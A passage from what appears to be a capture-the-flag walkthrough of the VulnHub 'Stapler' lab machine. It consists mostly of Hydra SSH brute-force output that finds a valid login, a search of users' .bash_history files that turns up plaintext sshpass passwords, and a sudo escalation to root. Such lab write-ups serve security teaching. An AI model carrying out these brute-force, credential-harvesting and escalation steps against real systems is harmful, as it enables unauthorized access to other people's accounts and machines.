[ATTEMPT] target stapler.com - login "elly" - pass "elly" - 4 of 114 [child 3] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "" - 5 of 114 [child 4] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "ylle" - 6 of 114 [child 5] (0/0)
[ATTEMPT] target stapler.com - login "John" - pass "John" - 7 of 114 [child 6] (0/0)
[ATTEMPT] target stapler.com - login "John" - pass "" - 8 of 114 [child 7] (0/0)
[ATTEMPT] target stapler.com - login "John" - pass "nhoJ" - 9 of 114 [child 8] (0/0)
[ATTEMPT] target stapler.com - login "john" - pass "john" - 10 of 114 [child 9] (0/0)
[ATTEMPT] target stapler.com - login "john" - pass "" - 11 of 114 [child 10] (0/0)
[ATTEMPT] target stapler.com - login "john" - pass "nhoj" - 12 of 114 [child 11] (0/0)
[ATTEMPT] target stapler.com - login "Harry" - pass "Harry" - 13 of 114 [child 12] (0/0)
[ATTEMPT] target stapler.com - login "Harry" - pass "" - 14 of 114 [child 13] (0/0)
[ATTEMPT] target stapler.com - login "Harry" - pass "yrraH" - 15 of 114 [child 14] (0/0)
[ATTEMPT] target stapler.com - login "harry" - pass "harry" - 16 of 114 [child 15] (0/0)
[ATTEMPT] target stapler.com - login "harry" - pass "" - 17 of 114 [child 5] (0/0)
[ATTEMPT] target stapler.com - login "harry" - pass "yrrah" - 18 of 114 [child 3] (0/0)
[ATTEMPT] target stapler.com - login "peter" - pass "peter" - 19 of 114 [child 4] (0/0)
[ATTEMPT] target stapler.com - login "peter" - pass "" - 20 of 114 [child 9] (0/0)
[ATTEMPT] target stapler.com - login "peter" - pass "retep" - 21 of 114 [child 6] (0/0)
[ATTEMPT] target stapler.com - login "RNunemaker" - pass "RNunemaker" - 22 of 114 [child 1] (0/0)
[ATTEMPT] target stapler.com - login "RNunemaker" - pass "" - 23 of 114 [child 2] (0/0)
[ATTEMPT] target stapler.com - login "RNunemaker" - pass "rekamenuNR" - 24 of 114 [child 7] (0/0)
[ATTEMPT] target stapler.com - login "ETollefson" - pass "ETollefson" - 25 of 114 [child 11] (0/0)
[ATTEMPT] target stapler.com - login "ETollefson" - pass "" - 26 of 114 [child 8] (0/0)
[ATTEMPT] target stapler.com - login "ETollefson" - pass "nosfelloTE" - 27 of 114 [child 10] (0/0)
[ATTEMPT] target stapler.com - login "DSwanger" - pass "DSwanger" - 28 of 114 [child 15] (0/0)
[ATTEMPT] target stapler.com - login "DSwanger" - pass "" - 29 of 114 [child 14] (0/0)
[ATTEMPT] target stapler.com - login "DSwanger" - pass "regnawSD" - 30 of 114 [child 12] (0/0)
[ATTEMPT] target stapler.com - login "AParnell" - pass "AParnell" - 31 of 114 [child 0] (0/0)
[ATTEMPT] target stapler.com - login "AParnell" - pass "" - 32 of 114 [child 13] (0/0)
[ATTEMPT] target stapler.com - login "AParnell" - pass "llenraPA" - 33 of 114 [child 5] (0/0)
[ATTEMPT] target stapler.com - login "SHayslett" - pass "SHayslett" - 34 of 114 [child 4] (0/0)
[ATTEMPT] target stapler.com - login "SHayslett" - pass "" - 35 of 114 [child 3] (0/0)
[ATTEMPT] target stapler.com - login "SHayslett" - pass "ttelsyaHS" - 36 of 114 [child 14] (0/0)
[ATTEMPT] target stapler.com - login "MBassin" - pass "MBassin" - 37 of 114 [child 0] (0/0)
[ATTEMPT] target stapler.com - login "MBassin" - pass "" - 38 of 114 [child 2] (0/0)
[ATTEMPT] target stapler.com - login "MBassin" - pass "nissaBM" - 39 of 114 [child 6] (0/0)
[ATTEMPT] target stapler.com - login "JBare" - pass "JBare" - 40 of 114 [child 12] (0/0)
[ATTEMPT] target stapler.com - login "JBare" - pass "" - 41 of 114 [child 1] (0/0)
[ATTEMPT] target stapler.com - login "JBare" - pass "eraBJ" - 42 of 114 [child 7] (0/0)
[ATTEMPT] target stapler.com - login "LSolum" - pass "LSolum" - 43 of 114 [child 8] (0/0)
[ATTEMPT] target stapler.com - login "LSolum" - pass "" - 44 of 114 [child 9] (0/0)
[ATTEMPT] target stapler.com - login "LSolum" - pass "muloSL" - 45 of 114 [child 10] (0/0)
[ATTEMPT] target stapler.com - login "IChadwick" - pass "IChadwick" - 46 of 114 [child 11] (0/0)
[ATTEMPT] target stapler.com - login "IChadwick" - pass "" - 47 of 114 [child 13] (0/0)
[ATTEMPT] target stapler.com - login "IChadwick" - pass "kciwdahCI" - 48 of 114 [child 15] (0/0)
[22][ssh] host: stapler.com login: SHayslett password: SHayslett
[ATTEMPT] target stapler.com - login "MFrei" - pass "MFrei" - 49 of 114 [child 4] (0/0)
[ATTEMPT] target stapler.com - login "MFrei" - pass "" - 50 of 114 [child 5] (0/0)
[ATTEMPT] target stapler.com - login "MFrei" - pass "ierFM" - 51 of 114 [child 3] (0/0)
[ATTEMPT] target stapler.com - login "SStroud" - pass "SStroud" - 52 of 114 [child 11] (0/0)
[ATTEMPT] target stapler.com - login "SStroud" - pass "" - 53 of 114 [child 12] (0/0)
[ATTEMPT] target stapler.com - login "SStroud" - pass "duortSS" - 54 of 114 [child 15] (0/0)
[ATTEMPT] target stapler.com - login "CCeaser" - pass "CCeaser" - 55 of 114 [child 10] (0/0)
[ATTEMPT] target stapler.com - login "CCeaser" - pass "" - 56 of 114 [child 6] (0/0)
[ATTEMPT] target stapler.com - login "CCeaser" - pass "resaeCC" - 57 of 114 [child 1] (0/0)
[ATTEMPT] target stapler.com - login "JKanode" - pass "JKanode" - 58 of 114 [child 2] (0/0)
[ATTEMPT] target stapler.com - login "JKanode" - pass "" - 59 of 114 [child 9] (0/0)
[ATTEMPT] target stapler.com - login "JKanode" - pass "edonaKJ" - 60 of 114 [child 14] (0/0)
[ATTEMPT] target stapler.com - login "CJoo" - pass "CJoo" - 61 of 114 [child 0] (0/0)
[ATTEMPT] target stapler.com - login "CJoo" - pass "" - 62 of 114 [child 7] (0/0)
[ATTEMPT] target stapler.com - login "CJoo" - pass "ooJC" - 63 of 114 [child 8] (0/0)
[ATTEMPT] target stapler.com - login "Eeth" - pass "Eeth" - 64 of 114 [child 13] (0/0)
[ATTEMPT] target stapler.com - login "Eeth" - pass "" - 65 of 114 [child 4] (0/0)
[ATTEMPT] target stapler.com - login "Eeth" - pass "hteE" - 66 of 114 [child 5] (0/0)
[ATTEMPT] target stapler.com - login "LSolum2" - pass "LSolum2" - 67 of 114 [child 3] (0/0)
[ATTEMPT] target stapler.com - login "LSolum2" - pass "" - 68 of 114 [child 11] (0/0)
[ATTEMPT] target stapler.com - login "LSolum2" - pass "2muloSL" - 69 of 114 [child 15] (0/0)
[ATTEMPT] target stapler.com - login "JLipps" - pass "JLipps" - 70 of 114 [child 12] (0/0)
[ATTEMPT] target stapler.com - login "JLipps" - pass "" - 71 of 114 [child 10] (0/0)
[ATTEMPT] target stapler.com - login "JLipps" - pass "sppiLJ" - 72 of 114 [child 13] (0/0)
[ATTEMPT] target stapler.com - login "jamie" - pass "jamie" - 73 of 114 [child 0] (0/0)
[ATTEMPT] target stapler.com - login "jamie" - pass "" - 74 of 114 [child 9] (0/0)
[ATTEMPT] target stapler.com - login "jamie" - pass "eimaj" - 75 of 114 [child 4] (0/0)
[ATTEMPT] target stapler.com - login "Sam" - pass "Sam" - 76 of 114 [child 7] (0/0)
[ATTEMPT] target stapler.com - login "Sam" - pass "" - 77 of 114 [child 2] (0/0)
[ATTEMPT] target stapler.com - login "Sam" - pass "maS" - 78 of 114 [child 6] (0/0)
[ATTEMPT] target stapler.com - login "Drew" - pass "Drew" - 79 of 114 [child 8] (0/0)
[ATTEMPT] target stapler.com - login "Drew" - pass "" - 80 of 114 [child 14] (0/0)
[ATTEMPT] target stapler.com - login "Drew" - pass "werD" - 81 of 114 [child 1] (0/0)
[ATTEMPT] target stapler.com - login "jess" - pass "jess" - 82 of 114 [child 5] (0/0)
[ATTEMPT] target stapler.com - login "jess" - pass "" - 83 of 114 [child 3] (0/0)
[ATTEMPT] target stapler.com - login "jess" - pass "ssej" - 84 of 114 [child 12] (0/0)
[ATTEMPT] target stapler.com - login "SHAY" - pass "SHAY" - 85 of 114 [child 10] (0/0)
[ATTEMPT] target stapler.com - login "SHAY" - pass "" - 86 of 114 [child 11] (0/0)
[ATTEMPT] target stapler.com - login "SHAY" - pass "YAHS" - 87 of 114 [child 13] (0/0)
[ATTEMPT] target stapler.com - login "Taylor" - pass "Taylor" - 88 of 114 [child 15] (0/0)
[ATTEMPT] target stapler.com - login "Taylor" - pass "" - 89 of 114 [child 0] (0/0)
[ATTEMPT] target stapler.com - login "Taylor" - pass "rolyaT" - 90 of 114 [child 4] (0/0)
[ATTEMPT] target stapler.com - login "mel" - pass "mel" - 91 of 114 [child 5] (0/0)
[ATTEMPT] target stapler.com - login "mel" - pass "" - 92 of 114 [child 1] (0/0)
[ATTEMPT] target stapler.com - login "mel" - pass "lem" - 93 of 114 [child 2] (0/0)
[ATTEMPT] target stapler.com - login "kai" - pass "kai" - 94 of 114 [child 6] (0/0)
[ATTEMPT] target stapler.com - login "kai" - pass "" - 95 of 114 [child 7] (0/0)
[ATTEMPT] target stapler.com - login "kai" - pass "iak" - 96 of 114 [child 8] (0/0)
[ATTEMPT] target stapler.com - login "zoe" - pass "zoe" - 97 of 114 [child 9] (0/0)
[ATTEMPT] target stapler.com - login "zoe" - pass "" - 98 of 114 [child 14] (0/0)
[ATTEMPT] target stapler.com - login "zoe" - pass "eoz" - 99 of 114 [child 3] (0/0)
[ATTEMPT] target stapler.com - login "NATHAN" - pass "NATHAN" - 100 of 114 [child 12] (0/0)
[ATTEMPT] target stapler.com - login "NATHAN" - pass "" - 101 of 114 [child 10] (0/0)
[ATTEMPT] target stapler.com - login "NATHAN" - pass "NAHTAN" - 102 of 114 [child 11] (0/0)
[ATTEMPT] target stapler.com - login "www" - pass "www" - 103 of 114 [child 13] (0/0)
[ATTEMPT] target stapler.com - login "www" - pass "" - 104 of 114 [child 15] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "elly" - 106 of 114 [child 0] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "" - 107 of 114 [child 4] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "ylle" - 108 of 114 [child 5] (0/0)
[ATTEMPT] target stapler.com - login "tim" - pass "tim" - 109 of 114 [child 1] (0/0)
[ATTEMPT] target stapler.com - login "tim" - pass "" - 110 of 114 [child 2] (0/0)
[ATTEMPT] target stapler.com - login "tim" - pass "mit" - 111 of 114 [child 7] (0/0)
[ATTEMPT] target stapler.com - login "Tim" - pass "Tim" - 112 of 114 [child 9] (0/0)
[ATTEMPT] target stapler.com - login "Tim" - pass "" - 113 of 114 [child 6] (0/0)
[ATTEMPT] target stapler.com - login "Tim" - pass "miT" - 114 of 114 [child 8] (0/0)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-07 08:37:02
And we have valid login.
[22][ssh] host: stapler.com login: SHayslett password: SHayslett
Low Shell
Login using the brute forced credentials.
kali@kali:~/Desktop/vulnhub/stapler$ ssh SHayslett@stapler.com
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
SHayslett@stapler.com's password:
Welcome back!
SHayslett@red:~$ id
uid=1005(SHayslett) gid=1005(SHayslett) groups=1005(SHayslett)
Root Shell
We can find some interesting stuff looking through the contents of bash_history of all the users
[00;31m[-] Location and contents (if accessible) of .bash_history file(s):[00m
/home/MFrei/.bash_history
exit
/home/Sam/.bash_history
exit
/home/CCeaser/.bash_history
free
exit
/home/DSwanger/.bash_history
exit
/home/JBare/.bash_history
exit
/home/mel/.bash_history
exit
/home/jess/.bash_history
exit
/home/MBassin/.bash_history
exit
/home/kai/.bash_history
exit
/home/elly/.bash_history
exit
/home/Drew/.bash_history
exit
/home/JLipps/.bash_history
exit
exit
/home/jamie/.bash_history
top
ps aux
exit
/home/Taylor/.bash_history
exit
id
/home/peter/.bash_history
/home/SHayslett/.bash_history
exit
/home/JKanode/.bash_history
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
/home/AParnell/.bash_history
exit
/home/CJoo/.bash_history
exit
/home/Eeth/.bash_history
exit
/home/RNunemaker/.bash_history
exit
/home/SHAY/.bash_history
exit
/home/ETollefson/.bash_history
exit
/home/IChadwick/.bash_history
exit
/home/LSolum2/.bash_history
exit
whoami
/home/SStroud/.bash_history
exit
/home/LSolum/.bash_history
exit
/home/NATHAN/.bash_history
exit
/home/zoe/.bash_history
top
exit
We can see some password in here.
/home/JKanode/.bash_history
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
Login using the credentials of peter
kali@kali:~$ ssh peter@stapler.com
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
peter@stapler.com's password:
Welcome back!
This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~). This function can help you with a few settings that should
make your use of the shell easier.
You can:
(q) Quit and do nothing. The function will be run again next time.
(0) Exit, creating the file ~/.zshrc containing just a comment.
That will prevent this function being run again.
(1) Continue to the main menu.
(2) Populate your ~/.zshrc with the configuration recommended
by the system administrator and exit (you will need to edit
the file by hand, if so desired).
--- Type one of the keys in parentheses ---
Aborting.
The function will be run again next time. To prevent this, execute:
touch ~/.zshrc
red% id
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
red% sudo su
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for peter:
➜ peter id
uid=0(root) gid=0(root) groups=0(root)
root was just a sudo away.
